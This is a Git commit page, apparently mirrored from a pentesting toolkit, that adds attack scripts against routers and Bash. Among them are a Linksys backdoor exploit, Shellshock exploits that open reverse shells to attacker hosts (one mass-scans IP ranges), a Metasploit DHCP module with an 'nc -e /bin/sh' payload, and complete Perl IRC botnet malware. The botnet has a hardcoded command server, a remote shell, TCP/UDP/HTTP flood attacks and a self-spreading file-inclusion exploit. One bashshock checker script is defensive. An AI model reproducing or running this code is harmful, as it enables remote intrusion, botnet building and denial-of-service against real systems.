Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-04-26 02:29:07 -04:00
Code Issues Packages Projects Releases Wiki Activity

some small fixes

Browse Source
This commit is contained in:
Mari Wahl 2014-10-01 14:40:43 -04:00
parent 16757b10ac
commit 9df63fa0ec
11 changed files with 1146 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

29
802.11 /crack_linksys.py Normal file
View File

@ -0,0 +1,29 @@
import socket
import struct
import sys
#HOST = '192.168.1.1'
HOST = '192.168.33.1'
PORT = 32764
def send_message(s, message, payload=''):
header = struct.pack('<III', 0x53634D4D, message, len(payload))
s.send(header+payload)
response = s.recv(0xC)
if len(response) != 12:
print("Device is not a crackable Linksys router.")
print("Recieved invalid response: %s" % response)
raise sys.exit(1)
sig, ret_val, ret_len = struct.unpack('<III', response)
assert(sig == 0x53634D4D)
if ret_val != 0:
return ret_val, "ERROR"
ret_str = ""
while len(ret_str) < ret_len:
ret_str += s.recv(ret_len-len(ret_str))
return ret_val, ret_str
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
send_message(s, 3, "wlan_mgr_enable=1")
print send_message(s, 2, "http_password")

37
OS_Injections/ShellShocker/scripts/bashshock_check.sh Executable file
View File

@ -0,0 +1,37 @@
#!/bin/bash
r=`x="() { :; }; echo x" bash -c ""`
if [ -n "$r" ]; then
echo -e '\033[91mVulnerable to CVE-2014-6271 (original shellshock)\033[39m'
else
echo -e '\033[92mNot vulnerable to CVE-2014-6271 (original shellshock)\033[39m'
fi
cd /tmp;rm echo 2>/dev/null
X='() { function a a>\' bash -c echo 2>/dev/null > /dev/null
if [ -e echo ]; then
echo -e "\033[91mVulnerable to CVE-2014-7169 (taviso bug)\033[39m"
else
echo -e "\033[92mNot vulnerable to CVE-2014-7169 (taviso bug)\033[39m"
fi
bash -c "true $(printf '<<EOF %.0s' {1..16})" 2>/dev/null
if [ $? != 0 ]; then
echo -e "\033[91mVulnerable to CVE-2014-7186 (redir_stack bug)\033[39m"
else
echo -e "\033[92mNot vulnerable to CVE-2014-7186 (redir_stack bug)\033[39m"
fi
bash -c "`for i in {1..200}; do echo -n "for x$i in; do :;"; done; for i in {1..200}; do echo -n "done;";done`" 2>/dev/null
if [ $? != 0 ]; then
echo -e "\033[91mVulnerable to CVE-2014-7187 (nested loops off by one)\033[39m"
else
echo -e "\033[96mTest for CVE-2014-7187 not reliable without address sanitizer\033[39m"
fi
r=`a="() { echo x;}" bash -c a 2>/dev/null`
if [ -n "$r" ]; then
echo -e "\033[93mVariable function parser still active, likely vulnerable to yet unknown parser bugs like CVE-2014-6277 (lcamtuf bug)\033[39m"
else
echo -e "\033[92mVariable function parser inactive, likely safe from unknown parser bugs\033[39m"
fi

21
OS_Injections/ShellShocker/scripts/cgi-bin-reverse-shell.py Normal file
View File

@ -0,0 +1,21 @@
#
#CVE-2014-6271 cgi-bin reverse shell
#
import httplib,urllib,sys
if (len(sys.argv)<4):
print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]
headers = {"Content-type": "application/x-www-form-urlencoded",
"test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data

68
OS_Injections/ShellShocker/scripts/check.py Normal file
View File

@ -0,0 +1,68 @@
We are...
_____ _________
/ _ \ ____ ____ ____ / _____/ ____ ____
/ /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
/ | \ | ( <_> ) | \/ \ ___/\ \___
\____|__ /___| /\____/|___| /_______ /\___ >\___ >
\/ \/ \/ \/ \/ \/
//Laughing at your security since 2012*
=================================================================================================
Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult
- Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64
=================================================================================================
# \!/ Enter your No-Ip address or other listening address in line 57 \!/
# \!/ Launch nc -l 31337 before executing script! \!/
# Dont forgets to update bash so you donts get PWNed while "testing"... lol
# yum -y update bash; apt-get -y update bash; reboot
# (Script is coded in python2.7, errors running with python3.0)
import httplib,urllib
print "###########################################################"
print "### ShellShock.py ###"
print "### Bash 0-day Environment Variable Injector ###"
print "### CVE-2014-6271 ###"
print "### *************************************************** ###"
print "### ###"
print "### It's either shell or be shelled ###"
print "### ###"
print "### _.-''|''-._ ###"
print "### .-' | `-. ###"
print "### .'\ | /`. ###"
print "### .' \ | / `. ###"
print "### \ \ | / / ###"
print "### `\ \ | / /' ###"
print "### `\ \ | / /' ###"
print "### `\ \ | / /' ###"
print "### _.-`\ \ | / /'-._ ###"
print "### {_____`\\|//'______} ###"
print "### `-' ###"
print "### ###"
print "### twitter.com/_d3f4ult ###"
print "###########################################################"
print "\n"
print '\t\!/ Reverse shell returned on port 31337 \!/\n'
print '\t Enter The First Three IP ranges To Scan \n'
url = raw_input(" [Example : 123.456.789] : ")
finput = input("Enter the Starting IP of Range to Scan : ")
sinput = input("Enter the Ending IP of Range to Scan for : ")
print
path = raw_input("Enter Vuln CGI Path : ")
for x in range(finput,sinput + 1):
murl = url + "." + str(x)
conn = httplib.HTTPConnection(murl)
reverse_shell='() { :; }; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1'
headers = {"Content-type": "application/x-www-form-urlencoded",
"test": reverse_shell}
conn.request("GET",path,headers=headers)
res = conn.getresponse()
if str(res.status) == '200':
print "[+] Website Present and Payload Successfully Sent To " + murl + path
data = res.read()
print data
else:
print "[!]" + murl + path + " Is Not Vulnerable."

84
OS_Injections/ShellShocker/scripts/dhclient_bash_env.rb Normal file
View File

@ -0,0 +1,84 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/proto/dhcp'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::DHCPServer
def initialize
super(
'Name' => 'DHCP Client Bash Environment Variable Code Injection',
'Description' => %q{
This module exploits a code injection in specially crafted environment
variables in Bash, specifically targeting dhclient network configuration
scripts through the HOSTNAME, DOMAINNAME, and URL DHCP options.
},
'Author' =>
[
'scriptjunkie', 'apconole[at]yahoo.com', # Original DHCP Server auxiliary module
'Stephane Chazelas', # Vulnerability discovery
'Ramon de C Valle' # This module
],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Service' ]
],
'PassiveActions' =>
[
'Service'
],
'DefaultAction' => 'Service',
'References' => [
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649',],
['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]
],
'DisclosureDate' => 'Sep 24 2014'
)
register_options(
[
OptString.new('CMD', [ true, 'The command to run', '/bin/nc -e /bin/sh 127.0.0.1 4444'])
], self.class)
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
end
def run
value = "() { :; }; PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin #{datastore['CMD']}"
hash = datastore.copy
hash['DOMAINNAME'] = value
hash['HOSTNAME'] = value
hash['URL'] = value
# This loop is required because the current DHCP Server exits after the
# first interaction.
loop do
begin
start_service(hash)
while @dhcp.thread.alive?
select(nil, nil, nil, 2)
end
rescue Interrupt
break
ensure
stop_service
end
end
end
end

119
OS_Injections/ShellShocker/scripts/exploit.nse Normal file
View File

@ -0,0 +1,119 @@
description = [[
Attempts to exploit the vulnerability known as "shellshock" against web applications via HTTP headers. By default it simply echoes back a random string but other commands may be injected.
To detect this vulnerability the script executes a command that prints a random string and then looks for it inside the page's body.
Vulnerability originally discovered by Stephane Chazelas.
References:
* http://www.openwall.com/lists/oss-security/2014/09/24/10
* http://seclists.org/oss-sec/2014/q3/685
*
]]
-- @usage
-- nmap -sV -p- --script http-shellshock <target>
-- nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | http-shellshock:
-- | VULNERABLE:
-- | HTTP Shellshock vulnerability
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-6271
-- | This web application might be affected by the vulnerability known as Shellshock. It seems the server
-- | is executing commands injected via malicious HTTP headers.
-- |
-- | Disclosure date: 2014-09-24
-- | References:
-- | http://www.openwall.com/lists/oss-security/2014/09/24/10
-- | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
-- | http://seclists.org/oss-sec/2014/q3/685
-- |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
--
-- @xmloutput
-- <elem key="title">HTTP Shellshock vulnerability</elem>
-- <elem key="state">VULNERABLE (Exploitable)</elem>
-- <table key="ids">
-- <elem>CVE:CVE-2014-6271</elem>
-- </table>
-- <table key="description">
-- <elem>This web application might be affected by the vulnerability known as Shellshock. It seems the server &#xa;is executing commands injected via malicious HTTP headers. &#xa; </elem>
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="year">2014</elem>
-- <elem key="day">24</elem>
-- <elem key="month">09</elem>
-- </table>
-- </table>
-- <elem key="disclosure">2014-09-24</elem>
-- <table key="refs">
-- <elem>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169</elem>
-- <elem>http://www.openwall.com/lists/oss-security/2014/09/24/10</elem>
-- <elem>http://seclists.org/oss-sec/2014/q3/685</elem>
-- <elem>http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271</elem>
-- </table>
-- @args http-shellshock.uri URI. Default: /
-- @args http-shellshock.header HTTP header to use in requests. Default: User-Agent
-- @args http-shellshock.cmd Custom command to send inside payload. Default: nil
---
author = {"Paulino Calderon <calderon()websec.mx","Paul Amar <paul()sensepost com>"}
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit","vuln","intrusive"}
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"
portrule = shortport.http
action = function(host, port)
local cmd = stdnse.get_script_args(SCRIPT_NAME..".cmd") or nil
local http_header = stdnse.get_script_args(SCRIPT_NAME..".header") or "User-Agent"
local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or '/'
local rnd = stdnse.generate_random_string(15)
local payload = '() { :;}; echo; echo "'..rnd..'"'
if cmd ~= nil then
cmd = '() { :;}; '..cmd
end
-- Plant the payload in the HTTP headers
local options = {header={}}
options["no_cache"] = true
options["header"][http_header] = payload
stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", payload, http_header))
local req = http.get(host, port, uri, options)
if req.status == 200 and string.match(req.body, rnd) ~= nil then
local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
local vuln = {
title = 'HTTP Shellshock vulnerability',
state = vulns.STATE.NOT_VULN,
description = [[
This web application might be affected by the vulnerability known as Shellshock. It seems the server
is executing commands injected via malicious HTTP headers.
]],
IDS = {CVE = 'CVE-2014-6271'},
references = {
'http://www.openwall.com/lists/oss-security/2014/09/24/10',
'http://seclists.org/oss-sec/2014/q3/685',
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169'
},
dates = {
disclosure = {year = '2014', month = '09', day = '24'},
},
}
stdnse.debug(1, string.format("Random pattern '%s' was found in page. Host seems vulnerable.", rnd))
vuln.state = vulns.STATE.EXPLOIT
if cmd ~= nil then
options["header"][http_header] = cmd
stdnse.debug(1, string.format("Sending '%s' via HTTP header '%s'", cmd, http_header))
req = http.get(host, port, uri, options)
vuln.exploit_results = req.body
end
return vuln_report:make_output(vuln)
end
end

47
OS_Injections/ShellShocker/scripts/exploit.php Normal file
View File

@ -0,0 +1,47 @@
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: https://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: https://prakharprasad.com && https://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
Test CGI Code : #!/bin/bash
echo "Content-type: text/html"
echo ""
echo "Bash-is-Vulnerable"
*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x = getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
}
$url = $x['u'];
$cmd = $x['c'];
$context = stream_context_create(
array(
'http' => array(
'method' => 'GET',
'header' => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
)
)
);
$req = file_get_contents($url, false, $context);
if(!$req && strpos($http_response_header[0],"500") > 0 )
die("Command sent to the server!\n");
else if($req && !strpos($http_response_header[0],"500") > 0)
die("Server didn't respond as it should!\n");
else if(!$req && $http_response_header == NULL)
die("A connection error occurred!\n")
?>

527
OS_Injections/ShellShocker/scripts/paylod.pl Normal file
View File

@ -0,0 +1,527 @@
#!/usr/bin/perl
# this spreader is coded by xdh
# xdh@xxxxxxxxxxx
# only for testing...
my @nickname = ("|PHP|");
my $nick = $nickname[rand scalar @nickname];
my $ircname = $nickname[rand scalar @nickname];
#system("kill -9 `ps ax |grep httpdse |grep -v grep|awk '{print $1;}'`");
my $processo = '/usr/sbin/atd';
# funny world...
my $linas_max='6';
my $sleep='5';
my @adms=("JB","x");
my @hostauth=("fuckoff","localhost");
my @canais=("#new");
chop (my $realname = 'vn');
$servidor='185.31.209.84' unless $servidor;
my $porta='443';
my $VERSAO = 'BUCEFALO';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/tmp");
#$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sendraw("PASS swedenrocks");
sleep 1;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_cliente->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
}
if (grep {$_ =~ /^\Q$hostmask\E$/i } @hostauth) {
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
if ($args =~ /^(\Q$meunick\E|\.say)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick".int rand(9999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal ddosit");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my
@portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout
=> 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
}
}
if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP]\002 Attack done ".$1.":".$2.".");
}
if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 perlb0t ver ".$VERSAO);
}
if ($funcarg =~ /^google\s+(\d+)\s+(.*)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Scanning for unpatched INDEXU for ".$1."
seconds.");
srand;
my $itime = time;
my ($cur_time);
my ($exploited);
$boturl=$2;
$cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
$cur_time = time - $itime;
@urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url =$path."/SQuery/lib/gore.php?libpath=$boturl?";
$page = http_query($url);
$exploited = $exploited + 1;
}
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[GOOGLE]\002 Exploited ".$exploited." boxes in ".$1."
seconds.");
}
if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking ".$1.":80 for ".$2." seconds.");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
}
if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Attacking ".$1." with ".$2." Kb packets for
".$3." seconds.");
my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent
".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
if ($case =~ /^part (.*)/) {
p("$1");
}
if ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
if ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
if ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
if ($case =~ /^nick (.*)/) {
nick("$1");
}
if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
if ($case =~ /^raw (.*)/) {
sendraw("$1");
}
if ($case =~ /^eval (.*)/) {
eval "$1";
}
}
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "No such file or directory");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c == "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65000; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
sendraw("PART $_[0]");
}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
}
# Spreader
# this 'spreader' code isnot mine, i dont know who coded it.
# update: well, i just fix0red this shit a bit.
#
sub fetch(){
my $rnd=(int(rand(9999)));
my $n= 80;
if ($rnd<5000) { $n<<=1;}
my $s= (int(rand(10)) * $n);
my @dominios = ("com","net","org","info","gov", "gob","gub","xxx",
"eu","mil","edu","aero","name","us","ca","mx","pa","ni","cu","pr","ve","co","pe","ec",
"py","cl","uy","ar","br","bo","au","nz","cz","kr","jp","th","tw","ph","cn","fi","de","es","pt","ch","se","su","it","gr","al","dk","pl","biz","int","pro","museum","coop",
"af","ad","ao","ai","aq","ag","an","sa","dz","ar","am","aw","at","az","bs","bh","bd","bb","be","bz","bj","bm","bt","by","ba","bw","bn","bg","bf","bi",
"vc","kh","cm","td","cs","cy","km","cg","cd","dj","dm","ci","cr","hr","kp","eg","sv","aw","er","sk",
"ee","et","ge","fi","fr","ga","gs","gh","gi","gb","uk","gd","gl","gp","gu","gt","gg","gn","gw","gq","gy","gf","ht","nl","hn","hk","hu","in","id","ir",
"iq","ie","is","ac","bv","cx","im","nf","ky","cc","ck","fo","hm","fk","mp","mh","pw","um","sb","sj","tc","vg","vi","wf","il","jm","je","jo","kz","ke",
"ki","kg","kw","lv","ls","lb","ly","lr","li","lt","lu","mo","mk","mg","my","mw","mv","ml","mt","mq","ma","mr","mu","yt","md","mc","mn","ms","mz","mm",
"na","nr","np","ni","ne","ng","nu","no","nc","om","pk","ps","pg","pn","pf","qa","sy","cf","la","re","rw","ro","ru","eh","kn","ws","as","sm","pm","vc",
"sh","lc","va","st","sn","sc","sl","sg","so","lk","za","sd","se","sr","sz","rj","tz","io","tf","tp","tg","to","tt","tn","tr","tm","tv","ug","ua","uz",
"vu","vn","ye","yu","cd","zm","zw","");
my @str;
foreach $dom (@dominios)
{
push (@str,"%22inurl%3Amodules.php%3Fname%3DSQuery%22+site%3A".$dom."%20");
}
my $query="www.google.com/search?q=";
$query.=$str[(rand(scalar(@str)))];
$query.="&num=$n&start=$s";
my @lst=();
my $page = http_query($query);
while ($page =~ m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
push (@lst,$1);
}
}
return (@lst);
}
sub http_query($){
my ($url) = @_;
my $host=$url;
my $query=$url;
my $page="";
$host =~ s/href=\"?http:\/\///;
$host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$query =~s/$host//;
if ($query eq "") {$query="/";};
eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
};
return $page;
}

107
